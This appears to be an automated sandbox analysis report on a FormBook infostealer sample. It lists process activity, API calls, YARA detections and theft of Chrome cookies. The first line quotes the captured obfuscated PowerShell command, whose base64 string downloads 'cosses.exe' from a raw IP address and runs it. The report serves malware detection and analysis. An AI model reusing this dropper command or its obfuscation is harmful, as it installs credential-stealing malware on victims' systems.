                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00167CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00167CAF
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0016874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_0016874B
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmp, cosses.exe.3.dr, cosses[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: cosses.exe, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0013862B cpuid 6_2_0013862B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00144E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00144E87
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00151E06 GetUserNameW,6_2_00151E06
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00143F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00143F3A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001149A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
